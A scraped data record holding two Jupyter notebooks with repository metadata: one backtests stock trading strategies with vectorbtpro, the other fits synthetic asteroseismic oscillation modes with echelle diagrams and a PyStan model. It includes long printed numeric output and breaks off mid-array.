[ "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ], [ "markdown", "markdown" ] ]
e72ed2380a80e50298918595bbad6a7cc360d7e0
48,578
ipynb
Jupyter Notebook
bot/wq.ipynb
psemdel/py-trading-bot
69da4164b3f6a3ed3e6dc81d5aefc0273b4cb019
[ "MIT" ]
null
null
null
bot/wq.ipynb
psemdel/py-trading-bot
69da4164b3f6a3ed3e6dc81d5aefc0273b4cb019
[ "MIT" ]
1
2022-02-07T21:13:55.000Z
2022-02-07T21:13:55.000Z
bot/wq.ipynb
psemdel/py-trading-bot
69da4164b3f6a3ed3e6dc81d5aefc0273b4cb019
[ "MIT" ]
null
null
null
35.175959
141
0.316975
[ [ [ "## To backstage the strategies with action pre-selection using historical and pre-saved data\n\nimport vectorbtpro as vbt\nimport numpy as np\nimport pandas as pd\n\nimport importlib\nimport inspect\nfrom numba import njit\nimport talib\nimport math\n\nfrom core import strat, indicators, bt\n\n\n", "_____no_output_____" ], [ "importlib.reload(bt)", "_____no_output_____" ], [ "#wq=bt.WQ(\"CAC40\",\"2007_2009\",54)\n#wq=bt.WQ(\"DAX\",\"2007_2009\",54)\nwq=bt.WQ(\"NASDAQ\",\"2007_2009\",54)\n", "_____no_output_____" ], [ "#wq.use_macro()\nwq.def_cand()\nwq.calculate(nostrat11=True) #only_exit_strat11=True\n\n\npf=vbt.Portfolio.from_signals(wq.close, wq.entries,wq.exits,short_entries=wq.entries_short,short_exits =wq.exits_short,freq=\"1d\",\n call_seq='auto',cash_sharing=True#, fees=0.0005\n )\npf.returns_stats()\n#pf.stats()\n\n", "_____no_output_____" ], [ "pf.plot()\n", "_____no_output_____" ], [ "pf=vbt.Portfolio.from_signals(wq.close, wq.entries,wq.exits,short_entries=wq.entries_short,short_exits =wq.exits_short,freq=\"1d\",\n call_seq='auto',cash_sharing=True,\n )\npf.returns_stats()", "_____no_output_____" ], [ "pf.trades.records.sort_values([\"entry_idx\"], ascending=True).head(50)", "_____no_output_____" ], [ "dic={}\n\nfor symbol in wq.close.columns:\n sub_pf=vbt.Portfolio.from_signals(wq.close[symbol], wq.entries[symbol],wq.exits[symbol],short_entries=wq.entries_short[symbol],\n short_exits =wq.exits_short[symbol],freq=\"1d\",\n call_seq='auto')\n dic[symbol]=sub_pf.get_total_return()\n#sub_pf.returns_stats()\n\ndic", "_____no_output_____" ], [ "symbol=\"AI\"\nsub_pf=vbt.Portfolio.from_signals(wq.close[symbol], wq.entries[symbol],wq.exits[symbol],short_entries=wq.entries_short[symbol],\n short_exits =wq.exits_short[symbol],freq=\"1d\",\n call_seq='auto')\n\nsub_pf.returns_stats()\n", "_____no_output_____" ], [ "sub_pf.plot()", "_____no_output_____" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
e72eeaf006ac4cd4fec9c098e6a4d35912e86968
724,487
ipynb
Jupyter Notebook
JoshFiles/Stan Practice/Mode_Fitting.ipynb
daw538/y4project
f8b7cb7c8ee0a5312a661a366e339371cf428533
[ "MIT" ]
null
null
null
JoshFiles/Stan Practice/Mode_Fitting.ipynb
daw538/y4project
f8b7cb7c8ee0a5312a661a366e339371cf428533
[ "MIT" ]
null
null
null
JoshFiles/Stan Practice/Mode_Fitting.ipynb
daw538/y4project
f8b7cb7c8ee0a5312a661a366e339371cf428533
[ "MIT" ]
null
null
null
532.711029
306,496
0.929887
[ [ [ "# Mode fitting\n\nHere we will make a simple hierarchical model that encodes some knowledge of quasi-equally spaced modes of oscillation into the prior. Using data from papers: ", "_____no_output_____" ] ], [ [ "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nimport seaborn as sns\nimport pystan", "_____no_output_____" ] ], [ [ "Spectral analysis of a signal generated by a sum of 14 cosine waves whose frequencies follow: \n\n$f_{n, {\\rm true}} = (n + 0.5) \\Delta \\nu + \\mathcal{N}(0, 0.02)$.\n\nThen spectral analysis identifies the component frequencies and from this the frequency spacing can be found.", "_____no_output_____" ] ], [ [ "def gaussian(f, f0, h, w):\n return h * np.exp(-0.5 * (f - f0)**2 / w**2)\n\nfs = 10e3\nN = 1e5\ndnu = 2.0\nnumax = 14.0\ntime = np.arange(N) / fs\nf0s = (np.arange(0, 14, 1) + 0.5) * dnu \n#f0s += np.random.randn(len(f0s)) * 0.02\nx = 0\n\nfor n in f0s:\n #print(gaussian(n, numax, 25.0, 5.0))\n x += gaussian(n, numax, 25.0, 5.0)*np.cos(2*np.pi*n*time)\n \nx += 200*np.random.randn(len(x))\nx = x/3.5\n\nf, Pxx_den = signal.periodogram(x, fs, scaling='spectrum')\n \nfig, axs = plt.subplots(1, 2, figsize=(14, 4))\naxs[0].plot(time,x)\naxs[0].set_ylabel('Luminosity (Arbitrary units)')\naxs[0].set_xlabel('Time (s)')\naxs[0].set_xlim([0, 3])\naxs[1].plot(f, Pxx_den)\n#axs[1].set_ylim([1e-7, 1e2])\naxs[1].set_xlim([0, 28])\naxs[1].set_xlabel('Frequency [Hz]')\naxs[1].set_ylabel('PSD')", "_____no_output_____" ] ], [ [ "Can find $\\Delta\\nu$ by calculating the distance between 2 adjacent peaks:", "_____no_output_____" ] ], [ [ "peaks = signal.find_peaks(Pxx_den, 3)\nfor i in range(len(peaks[0])-1):\n print(f[peaks[0][i+1]]-f[peaks[0][i]])", "2.0\n2.0\n2.0\n2.0\n2.0\n" ], [ "bin_width = f[1] - f[0]\nw = int(dnu / bin_width)\ns = 0\nh = int(np.floor(len(Pxx_den[s:]) / w))\nprint(len(Pxx_den[s:]))\nprint(h,w)\nladder_p = np.reshape(Pxx_den[s:h*w+s], [h, w])\nladder_f = np.reshape(f[s:h*w+s], [h, w])", "50001\n2500 20\n" ], [ "from astropy.convolution import Gaussian1DKernel, convolve\nfig, ax = plt.subplots()\nax.plot(ladder_f[0,:] / dnu, np.mean(ladder_p, axis=0))\n# Create kernel\ng = Gaussian1DKernel(stddev=2)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'k-', lw=2)\n# Create kernel\ng = Gaussian1DKernel(stddev=10)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'r-', lw=1)", "_____no_output_____" ], [ "n_max = numax / dnu\nnn = 14\nd_f = ladder_f[0,:] / dnu", "_____no_output_____" ], [ "fig, ax = plt.subplots(nn)\nfor i in range(int(nn)):\n ax[i].plot(d_f, ladder_p[i,:], label=f'Index: {i}')\n ax[i].set_yticks([]) \nplt.subplots_adjust(hspace=0.0, wspace=0.0)\n\n#print(len(ladder_f[0,:]))\n#print(len(ladder_p[:,0]))\n#print(ladder_f) \n#print(ladder_p)", "_____no_output_____" ], [ "code = '''\nfunctions {\n real gaussian(real f, real numax, real width, real height){\n return height * exp(-0.5 * (f - numax)^2 / width^2);\n }\n}\ndata {\n int N; // Data points per order\n int M; // Number of orders\n real freq[M, N];\n real snr[M, N];\n real dnu_est;\n real numax_est;\n}\nparameters {\n real<lower = 0> dnu;\n real<lower = 0> numax;\n real<lower = 0> envwidth;\n real<lower = 0> envheight;\n real modewidth;\n real delta[M];\n real<lower = 0> scale;\n}\ntransformed parameters {\n real mode_freqs[M];\n real mode_heights[M];\n for (i in 1:M){\n mode_freqs[i] = (i-0.5) * dnu + delta[i] * scale;\n mode_heights[i] = gaussian(mode_freqs[i], numax, envwidth, envheight);\n }\n}\nmodel {\n real beta[N];\n for (i in 1:M){\n for (j in 1:N){\n beta[j] = (1.0 + lor(freq[i, j], mode_freqs[i], modewidth, mode_heights[i]));\n }\n snr[i, :] ~ normal(beta, 1.0);\n }\n dnu ~ normal(dnu_est, dnu_est * 0.01);\n dnu ~ uniform(dnu_est * 0.9, dnu_est * 1.1);\n numax ~ normal(numax_est, numax_est * 0.01);\n numax ~ uniform(numax_est * 0.9, numax_est * 1.1);\n envwidth ~ normal(5.0, 1.0);\n envheight ~ normal(25.0, 3.0);\n modewidth ~ lognormal(log(0.1), 0.05);\n modewidth ~ uniform(0, 0.5);\n delta ~ normal(0, 1); \n scale ~ normal(0, 0.01);\n}\n'''\nimport pystan\nsm = pystan.StanModel(model_code=code)", "INFO:pystan:COMPILING THE C++ CODE FOR MODEL anon_model_ae1e6452f5130395d3f50a4387192288 NOW.\n/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/Cython/Compiler/Main.py:367: FutureWarning: Cython directive 'language_level' not set, using 2 for now (Py2). This will change in a later release! File: /var/folders/2_/b8v0t8pn1hj1p3r4lyfvvv2h0000gn/T/tmpomjnfxvw/stanfit4anon_model_ae1e6452f5130395d3f50a4387192288_2879619315622853885.pyx\n tree = Parsing.p_module(s, pxd, full_module_name)\n" ], [ "stan_data = {'N': len(ladder_f[0,:]), 'M': len(ladder_p[:,0]), \n 'freq': ladder_f, 'snr': ladder_p,\n 'dnu_est': dnu, 'numax_est': numax}\nnchains = 4\nstart = {'dnu': dnu, 'numax': numax}\nfitsm = sm.sampling(data=stan_data, iter=20000, chains=nchains, init=[start for n in range(nchains)])", "_____no_output_____" ], [ "fitsm.plot()\nplt.show()", "_____no_output_____" ], [ "print(fitsm)", "_____no_output_____" ] ], [ [ "# Guy's Code\n\nLet's set up the data first. We will define a bunch of Lorentzian modes that are nearly equally spaced in frequency. The mode heights will be controlled by a Gaussian function. \n\nSo the mode frequencies will be defined as:\n\n$f_{n, {\\rm true}} = (n + 0.5) \\Delta \\nu + \\mathcal{N}(0, 0.02)$.\n\nand the envelope (height of lorentzian) will just be:\n\n$H_n = 25.0 \\exp(-0.5 (f_{n, {\\rm true}} - \\nu_{\\rm max})^2 / 5^2)$\n\nThe data are then just the model of the sum of the Lorentzians, evaluated a frequencies $f_{i}$, plus 1. To the data we add Gaussian noise (to keep things simple) with mean zero and standard deviation of unity.", "_____no_output_____" ] ], [ [ "def lor(f, f0, w, h):\n return h / (1.0 + 4.0 * ((f - f0)/w)**2)\n\ndef gaussian(f, f0, h, w):\n return h * np.exp(-0.5 * (f - f0)**2 / w**2)\n\nnp.random.seed(53)\nf = np.linspace(0, 28, 1000)\ndnu = 2.0\nnumax = 14.0\nf0s = (np.arange(0, 14, 1) + 0.5) * dnu \nf0s += np.random.randn(len(f0s)) * 0.02 #f_n,true\ntrue = np.ones(len(f))\ntrue += np.sum([lor(f, n, 0.1, gaussian(n, numax, 25.0, 5.0)) for n in f0s], axis=0)\n#data = true * np.random.chisquare(2, len(true)) / 2.0\ndata = true + np.random.randn(len(true))\nfig, ax = plt.subplots()\nax.plot(f, true, label='True', zorder=0)\nax.plot(f, data, label='Data', alpha=0.4)\nax.legend()\nax.set_ylabel('SNR')\nax.set_xlabel('Frequnency')", "_____no_output_____" ] ], [ [ "We now transform the data into a ladder, or echelle, with one mode in each segment.", "_____no_output_____" ] ], [ [ "bin_width = f[1] - f[0]\nprint(bin_width)\nw = int(dnu / bin_width)\nprint(len(data[s:]), w)\ns = 0\nh = int(np.floor(len(data[s:]) / w))\nladder_p = np.reshape(data[s:h*w+s], [h, w])\nladder_f = np.reshape(f[s:h*w+s], [h, w])", "0.1\n1000 20\n" ] ], [ [ "We can collapse the echelle and combine with some smoothing techniques to show you the data:", "_____no_output_____" ] ], [ [ "from astropy.convolution import Gaussian1DKernel, convolve\nfig, ax = plt.subplots()\nax.plot(ladder_f[0,:] / dnu, np.mean(ladder_p, axis=0))\n# Create kernel\ng = Gaussian1DKernel(stddev=5)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'k-', lw=2)\n# Create kernel\ng = Gaussian1DKernel(stddev=15)\n# Convolve data\nz = convolve(np.mean(ladder_p, axis=0), g)\nax.plot(ladder_f[0,:] / dnu, z, 'r-', lw=1)", "_____no_output_____" ], [ "n_max = numax / dnu\nnn = 14\nd_f = ladder_f[0,:] / dnu", "_____no_output_____" ] ], [ [ "Now we can plot the uncollapsed echelle:", "_____no_output_____" ] ], [ [ "fig, ax = plt.subplots(nn)\nfor i in range(int(nn)):\n ax[i].plot(d_f, ladder_p[i,:], label=f'Index: {i}')\n ax[i].set_yticks([]) \nplt.subplots_adjust(hspace=0.0, wspace=0.0)\n\n#print(len(ladder_f[0,:]))\n#print(len(ladder_p[:,0]))\n#print(ladder_f) \n#print(ladder_p)", "71\n14\n[[ 0. 0.02802803 0.05605606 0.08408408 0.11211211 0.14014014\n 0.16816817 0.1961962 0.22422422 0.25225225 0.28028028 0.30830831\n 0.33633634 0.36436436 0.39239239 0.42042042 0.44844845 0.47647648\n 0.5045045 0.53253253 0.56056056 0.58858859 0.61661662 0.64464464\n 0.67267267 0.7007007 0.72872873 0.75675676 0.78478478 0.81281281\n 0.84084084 0.86886887 0.8968969 0.92492492 0.95295295 0.98098098\n 1.00900901 1.03703704 1.06506507 1.09309309 1.12112112 1.14914915\n 1.17717718 1.20520521 1.23323323 1.26126126 1.28928929 1.31731732\n 1.34534535 1.37337337 1.4014014 1.42942943 1.45745746 1.48548549\n 1.51351351 1.54154154 1.56956957 1.5975976 1.62562563 1.65365365\n 1.68168168 1.70970971 1.73773774 1.76576577 1.79379379 1.82182182\n 1.84984985 1.87787788 1.90590591 1.93393393 1.96196196]\n [ 1.98998999 2.01801802 2.04604605 2.07407407 2.1021021 2.13013013\n 2.15815816 2.18618619 2.21421421 2.24224224 2.27027027 2.2982983\n 2.32632633 2.35435435 2.38238238 2.41041041 2.43843844 2.46646647\n 2.49449449 2.52252252 2.55055055 2.57857858 2.60660661 2.63463463\n 2.66266266 2.69069069 2.71871872 2.74674675 2.77477477 2.8028028\n 2.83083083 2.85885886 2.88688689 2.91491491 2.94294294 2.97097097\n 2.998999 3.02702703 3.05505506 3.08308308 3.11111111 3.13913914\n 3.16716717 3.1951952 3.22322322 3.25125125 3.27927928 3.30730731\n 3.33533534 3.36336336 3.39139139 3.41941942 3.44744745 3.47547548\n 3.5035035 3.53153153 3.55955956 3.58758759 3.61561562 3.64364364\n 3.67167167 3.6996997 3.72772773 3.75575576 3.78378378 3.81181181\n 3.83983984 3.86786787 3.8958959 3.92392392 3.95195195]\n [ 3.97997998 4.00800801 4.03603604 4.06406406 4.09209209 4.12012012\n 4.14814815 4.17617618 4.2042042 4.23223223 4.26026026 4.28828829\n 4.31631632 4.34434434 4.37237237 4.4004004 4.42842843 4.45645646\n 4.48448448 4.51251251 4.54054054 4.56856857 4.5965966 4.62462462\n 4.65265265 4.68068068 4.70870871 4.73673674 4.76476476 4.79279279\n 4.82082082 4.84884885 4.87687688 4.9049049 4.93293293 4.96096096\n 4.98898899 5.01701702 5.04504505 5.07307307 5.1011011 5.12912913\n 5.15715716 5.18518519 5.21321321 5.24124124 5.26926927 5.2972973\n 5.32532533 5.35335335 5.38138138 5.40940941 5.43743744 5.46546547\n 5.49349349 5.52152152 5.54954955 5.57757758 5.60560561 5.63363363\n 5.66166166 5.68968969 5.71771772 5.74574575 5.77377377 5.8018018\n 5.82982983 5.85785786 5.88588589 5.91391391 5.94194194]\n [ 5.96996997 5.997998 6.02602603 6.05405405 6.08208208 6.11011011\n 6.13813814 6.16616617 6.19419419 6.22222222 6.25025025 6.27827828\n 6.30630631 6.33433433 6.36236236 6.39039039 6.41841842 6.44644645\n 6.47447447 6.5025025 6.53053053 6.55855856 6.58658659 6.61461461\n 6.64264264 6.67067067 6.6986987 6.72672673 6.75475475 6.78278278\n 6.81081081 6.83883884 6.86686687 6.89489489 6.92292292 6.95095095\n 6.97897898 7.00700701 7.03503504 7.06306306 7.09109109 7.11911912\n 7.14714715 7.17517518 7.2032032 7.23123123 7.25925926 7.28728729\n 7.31531532 7.34334334 7.37137137 7.3993994 7.42742743 7.45545546\n 7.48348348 7.51151151 7.53953954 7.56756757 7.5955956 7.62362362\n 7.65165165 7.67967968 7.70770771 7.73573574 7.76376376 7.79179179\n 7.81981982 7.84784785 7.87587588 7.9039039 7.93193193]\n [ 7.95995996 7.98798799 8.01601602 8.04404404 8.07207207 8.1001001\n 8.12812813 8.15615616 8.18418418 8.21221221 8.24024024 8.26826827\n 8.2962963 8.32432432 8.35235235 8.38038038 8.40840841 8.43643644\n 8.46446446 8.49249249 8.52052052 8.54854855 8.57657658 8.6046046\n 8.63263263 8.66066066 8.68868869 8.71671672 8.74474474 8.77277277\n 8.8008008 8.82882883 8.85685686 8.88488488 8.91291291 8.94094094\n 8.96896897 8.996997 9.02502503 9.05305305 9.08108108 9.10910911\n 9.13713714 9.16516517 9.19319319 9.22122122 9.24924925 9.27727728\n 9.30530531 9.33333333 9.36136136 9.38938939 9.41741742 9.44544545\n 9.47347347 9.5015015 9.52952953 9.55755756 9.58558559 9.61361361\n 9.64164164 9.66966967 9.6976977 9.72572573 9.75375375 9.78178178\n 9.80980981 9.83783784 9.86586587 9.89389389 9.92192192]\n [ 9.94994995 9.97797798 10.00600601 10.03403403 10.06206206 10.09009009\n 10.11811812 10.14614615 10.17417417 10.2022022 10.23023023 10.25825826\n 10.28628629 10.31431431 10.34234234 10.37037037 10.3983984 10.42642643\n 10.45445445 10.48248248 10.51051051 10.53853854 10.56656657 10.59459459\n 10.62262262 10.65065065 10.67867868 10.70670671 10.73473473 10.76276276\n 10.79079079 10.81881882 10.84684685 10.87487487 10.9029029 10.93093093\n 10.95895896 10.98698699 11.01501502 11.04304304 11.07107107 11.0990991\n 11.12712713 11.15515516 11.18318318 11.21121121 11.23923924 11.26726727\n 11.2952953 11.32332332 11.35135135 11.37937938 11.40740741 11.43543544\n 11.46346346 11.49149149 11.51951952 11.54754755 11.57557558 11.6036036\n 11.63163163 11.65965966 11.68768769 11.71571572 11.74374374 11.77177177\n 11.7997998 11.82782783 11.85585586 11.88388388 11.91191191]\n [11.93993994 11.96796797 11.995996 12.02402402 12.05205205 12.08008008\n 12.10810811 12.13613614 12.16416416 12.19219219 12.22022022 12.24824825\n 12.27627628 12.3043043 12.33233233 12.36036036 12.38838839 12.41641642\n 12.44444444 12.47247247 12.5005005 12.52852853 12.55655656 12.58458458\n 12.61261261 12.64064064 12.66866867 12.6966967 12.72472472 12.75275275\n 12.78078078 12.80880881 12.83683684 12.86486486 12.89289289 12.92092092\n 12.94894895 12.97697698 13.00500501 13.03303303 13.06106106 13.08908909\n 13.11711712 13.14514515 13.17317317 13.2012012 13.22922923 13.25725726\n 13.28528529 13.31331331 13.34134134 13.36936937 13.3973974 13.42542543\n 13.45345345 13.48148148 13.50950951 13.53753754 13.56556557 13.59359359\n 13.62162162 13.64964965 13.67767768 13.70570571 13.73373373 13.76176176\n 13.78978979 13.81781782 13.84584585 13.87387387 13.9019019 ]\n [13.92992993 13.95795796 13.98598599 14.01401401 14.04204204 14.07007007\n 14.0980981 14.12612613 14.15415415 14.18218218 14.21021021 14.23823824\n 14.26626627 14.29429429 14.32232232 14.35035035 14.37837838 14.40640641\n 14.43443443 14.46246246 14.49049049 14.51851852 14.54654655 14.57457457\n 14.6026026 14.63063063 14.65865866 14.68668669 14.71471471 14.74274274\n 14.77077077 14.7987988 14.82682683 14.85485485 14.88288288 14.91091091\n 14.93893894 14.96696697 14.99499499 15.02302302 15.05105105 15.07907908\n 15.10710711 15.13513514 15.16316316 15.19119119 15.21921922 15.24724725\n 15.27527528 15.3033033 15.33133133 15.35935936 15.38738739 15.41541542\n 15.44344344 15.47147147 15.4994995 15.52752753 15.55555556 15.58358358\n 15.61161161 15.63963964 15.66766767 15.6956957 15.72372372 15.75175175\n 15.77977978 15.80780781 15.83583584 15.86386386 15.89189189]\n [15.91991992 15.94794795 15.97597598 16.004004 16.03203203 16.06006006\n 16.08808809 16.11611612 16.14414414 16.17217217 16.2002002 16.22822823\n 16.25625626 16.28428428 16.31231231 16.34034034 16.36836837 16.3963964\n 16.42442442 16.45245245 16.48048048 16.50850851 16.53653654 16.56456456\n 16.59259259 16.62062062 16.64864865 16.67667668 16.7047047 16.73273273\n 16.76076076 16.78878879 16.81681682 16.84484484 16.87287287 16.9009009\n 16.92892893 16.95695696 16.98498498 17.01301301 17.04104104 17.06906907\n 17.0970971 17.12512513 17.15315315 17.18118118 17.20920921 17.23723724\n 17.26526527 17.29329329 17.32132132 17.34934935 17.37737738 17.40540541\n 17.43343343 17.46146146 17.48948949 17.51751752 17.54554555 17.57357357\n 17.6016016 17.62962963 17.65765766 17.68568569 17.71371371 17.74174174\n 17.76976977 17.7977978 17.82582583 17.85385385 17.88188188]\n [17.90990991 17.93793794 17.96596597 17.99399399 18.02202202 18.05005005\n 18.07807808 18.10610611 18.13413413 18.16216216 18.19019019 18.21821822\n 18.24624625 18.27427427 18.3023023 18.33033033 18.35835836 18.38638639\n 18.41441441 18.44244244 18.47047047 18.4984985 18.52652653 18.55455455\n 18.58258258 18.61061061 18.63863864 18.66666667 18.69469469 18.72272272\n 18.75075075 18.77877878 18.80680681 18.83483483 18.86286286 18.89089089\n 18.91891892 18.94694695 18.97497497 19.003003 19.03103103 19.05905906\n 19.08708709 19.11511512 19.14314314 19.17117117 19.1991992 19.22722723\n 19.25525526 19.28328328 19.31131131 19.33933934 19.36736737 19.3953954\n 19.42342342 19.45145145 19.47947948 19.50750751 19.53553554 19.56356356\n 19.59159159 19.61961962 19.64764765 19.67567568 19.7037037 19.73173173\n 19.75975976 19.78778779 19.81581582 19.84384384 19.87187187]\n [19.8998999 19.92792793 19.95595596 19.98398398 20.01201201 20.04004004\n 20.06806807 20.0960961 20.12412412 20.15215215 20.18018018 20.20820821\n 20.23623624 20.26426426 20.29229229 20.32032032 20.34834835 20.37637638\n 20.4044044 20.43243243 20.46046046 20.48848849 20.51651652 20.54454454\n 20.57257257 20.6006006 20.62862863 20.65665666 20.68468468 20.71271271\n 20.74074074 20.76876877 20.7967968 20.82482482 20.85285285 20.88088088\n 20.90890891 20.93693694 20.96496496 20.99299299 21.02102102 21.04904905\n 21.07707708 21.10510511 21.13313313 21.16116116 21.18918919 21.21721722\n 21.24524525 21.27327327 21.3013013 21.32932933 21.35735736 21.38538539\n 21.41341341 21.44144144 21.46946947 21.4974975 21.52552553 21.55355355\n 21.58158158 21.60960961 21.63763764 21.66566567 21.69369369 21.72172172\n 21.74974975 21.77777778 21.80580581 21.83383383 21.86186186]\n [21.88988989 21.91791792 21.94594595 21.97397397 22.002002 22.03003003\n 22.05805806 22.08608609 22.11411411 22.14214214 22.17017017 22.1981982\n 22.22622623 22.25425425 22.28228228 22.31031031 22.33833834 22.36636637\n 22.39439439 22.42242242 22.45045045 22.47847848 22.50650651 22.53453453\n 22.56256256 22.59059059 22.61861862 22.64664665 22.67467467 22.7027027\n 22.73073073 22.75875876 22.78678679 22.81481481 22.84284284 22.87087087\n 22.8988989 22.92692693 22.95495495 22.98298298 23.01101101 23.03903904\n 23.06706707 23.0950951 23.12312312 23.15115115 23.17917918 23.20720721\n 23.23523524 23.26326326 23.29129129 23.31931932 23.34734735 23.37537538\n 23.4034034 23.43143143 23.45945946 23.48748749 23.51551552 23.54354354\n 23.57157157 23.5995996 23.62762763 23.65565566 23.68368368 23.71171171\n 23.73973974 23.76776777 23.7957958 23.82382382 23.85185185]\n [23.87987988 23.90790791 23.93593594 23.96396396 23.99199199 24.02002002\n 24.04804805 24.07607608 24.1041041 24.13213213 24.16016016 24.18818819\n 24.21621622 24.24424424 24.27227227 24.3003003 24.32832833 24.35635636\n 24.38438438 24.41241241 24.44044044 24.46846847 24.4964965 24.52452452\n 24.55255255 24.58058058 24.60860861 24.63663664 24.66466466 24.69269269\n 24.72072072 24.74874875 24.77677678 24.8048048 24.83283283 24.86086086\n 24.88888889 24.91691692 24.94494494 24.97297297 25.001001 25.02902903\n 25.05705706 25.08508509 25.11311311 25.14114114 25.16916917 25.1971972\n 25.22522523 25.25325325 25.28128128 25.30930931 25.33733734 25.36536537\n 25.39339339 25.42142142 25.44944945 25.47747748 25.50550551 25.53353353\n 25.56156156 25.58958959 25.61761762 25.64564565 25.67367367 25.7017017\n 25.72972973 25.75775776 25.78578579 25.81381381 25.84184184]\n [25.86986987 25.8978979 25.92592593 25.95395395 25.98198198 26.01001001\n 26.03803804 26.06606607 26.09409409 26.12212212 26.15015015 26.17817818\n 26.20620621 26.23423423 26.26226226 26.29029029 26.31831832 26.34634635\n 26.37437437 26.4024024 26.43043043 26.45845846 26.48648649 26.51451451\n 26.54254254 26.57057057 26.5985986 26.62662663 26.65465465 26.68268268\n 26.71071071 26.73873874 26.76676677 26.79479479 26.82282282 26.85085085\n 26.87887888 26.90690691 26.93493493 26.96296296 26.99099099 27.01901902\n 27.04704705 27.07507508 27.1031031 27.13113113 27.15915916 27.18718719\n 27.21521522 27.24324324 27.27127127 27.2992993 27.32732733 27.35535536\n 27.38338338 27.41141141 27.43943944 27.46746747 27.4954955 27.52352352\n 27.55155155 27.57957958 27.60760761 27.63563564 27.66366366 27.69169169\n 27.71971972 27.74774775 27.77577578 27.8038038 27.83183183]]\n[[ 1.91675756e+00 -1.05612919e+00 2.74001600e+00 -5.00802069e-02\n 2.81231605e+00 2.84592504e+00 3.40480508e+00 1.54987543e+00\n 7.79606284e-01 7.35137346e-01 2.10674410e+00 8.29729277e-01\n 7.84910755e-01 1.33678103e+00 -1.03371550e+00 -1.33023405e+00\n 1.45058122e+00 9.42209005e-01 1.55694463e+00 1.87939243e+00\n 1.98146709e-01 5.60858259e-01 1.84028794e+00 3.02941180e-02\n 1.65857602e+00 6.24590374e-01 2.98333518e-01 3.36039873e-01\n 1.04253504e+00 5.76140631e-01 2.09053984e-01 2.40542784e+00\n 1.89113834e+00 6.80793799e-01 1.86818656e+00 2.50719548e+00\n 1.70164099e+00 9.83210363e-01 1.19658698e-01 1.33467684e+00\n 5.13950226e-01 1.48559131e+00 6.65594600e-01 9.31675890e-01\n 2.42335859e+00 1.84617436e+00 1.91451657e+00 1.53080298e+00\n 1.42830977e+00 2.82355118e+00 1.82205303e+00 1.29015631e+00\n 1.34916552e+00 1.92091164e+00 1.18586820e+00 6.08176554e-01\n 2.85537129e+00 8.18157203e-01 1.69108022e+00 4.03508449e-02\n 1.31571904e+00 1.68469680e+00 1.19393305e+00 -3.60639195e-01\n 1.22093979e+00 2.02459758e+00 1.65722468e+00 -9.02430279e-01\n 1.53527605e+00 2.24133579e-02 9.53439516e-01]\n [ 2.11435545e+00 1.48509675e+00 8.65489514e-01 4.41312938e-02\n 2.08598021e+00 1.63281198e+00 -5.26530443e-01 1.51752908e+00\n -5.72716027e-01 -1.18688803e+00 1.66342295e+00 1.43578191e+00\n 7.75656107e-01 -8.25017305e-02 4.55392900e-01 1.04454376e+00\n 1.27104653e+00 2.83983802e+00 2.44113325e+00 6.19683440e-01\n 1.17823201e+00 1.59241416e+00 2.59785014e+00 2.60187085e-01\n 1.21972681e+00 2.33167672e+00 1.31923559e+00 -1.00518589e+00\n 4.10327380e-01 3.26168068e+00 -1.05137641e-01 1.81976841e+00\n 1.48388169e+00 1.85285337e+00 3.08747012e+00 3.61845021e+00\n 3.85173538e+00 5.46330778e+00 2.87134170e+00 2.62018094e+00\n 1.99265220e+00 -3.61135351e-01 3.20124938e+00 -1.25272365e+00\n 9.72339410e-01 1.21898458e-01 2.30778590e+00 1.22440946e+00\n 1.76180137e+00 8.19096751e-01 -8.53433163e-01 1.87201240e+00\n -2.62624730e-01 -5.75176638e-01 9.29048920e-01 2.81112688e+00\n 9.17750410e-01 7.45479233e-01 5.78462808e-01 1.42765231e+00\n -3.20019884e-01 1.28757200e+00 1.50542461e-01 3.41692411e-01\n 1.30584411e+00 1.96495189e+00 1.41840792e+00 1.55078672e-01\n 1.08006734e+00 -2.00464414e-01 1.90291823e-01]\n [ 1.98997599e+00 8.65808051e-01 -4.37118606e-01 2.12951408e+00\n 1.52369397e+00 9.51762435e-01 5.23189030e-01 1.28462323e+00\n 1.36872548e+00 9.18051074e-01 1.52824436e+00 1.35244565e+00\n 2.57602079e+00 1.94872570e-01 2.64203314e+00 -9.25741451e-01\n 2.56236646e+00 3.05896866e-01 1.28809757e+00 1.26268488e+00\n 2.85152418e+00 1.65386790e+00 1.03701406e+00 1.10688367e+00\n 1.62456989e+00 1.36234609e+00 1.73125902e+00 1.57552934e+00\n 5.72791496e-01 -2.97752879e-01 2.12765303e+00 1.06660312e+00\n 2.51640055e+00 2.90522309e+00 5.82555096e+00 4.50966336e+00\n 3.38472081e+00 2.10489040e+00 2.34150165e+00 1.12284251e+00\n 1.98201388e+00 2.09218630e+00 -5.41168134e-01 -9.48015543e-01\n 3.78537719e-01 8.94248938e-01 1.57193568e+00 2.40199150e+00\n 1.43915982e+00 1.67992585e+00 1.55161317e+00 2.49970264e+00\n 6.47985617e-01 2.05961626e+00 3.22359368e+00 1.83912590e+00\n 2.06020591e+00 -1.00450961e+00 1.02081495e+00 4.95359006e-01\n -3.11187175e-01 1.26791336e+00 8.10655933e-01 5.59604359e-01\n -2.79270819e-01 1.06644478e+00 1.43884569e+00 1.17662750e+00\n 2.57926170e+00 1.03249447e+00 8.92900388e-01]\n [ 2.96427473e-01 3.45721782e-01 -6.59990517e-01 6.16020463e-01\n -1.23051855e-02 8.17092584e-01 -7.93939931e-01 -9.09236037e-02\n 1.43743845e+00 9.96601898e-01 1.51197557e+00 -2.08145603e-01\n -7.74818284e-01 1.77929880e-01 1.04650399e+00 1.51932976e+00\n 1.89636899e+00 2.80952668e+00 2.24404959e+00 2.91484979e-01\n 7.33276802e-01 5.06146207e-01 1.66836568e+00 1.78353328e+00\n 2.49290584e-01 2.42185659e+00 1.41386630e+00 8.59096879e-01\n 5.02732870e-01 2.41543988e+00 -6.70082822e-01 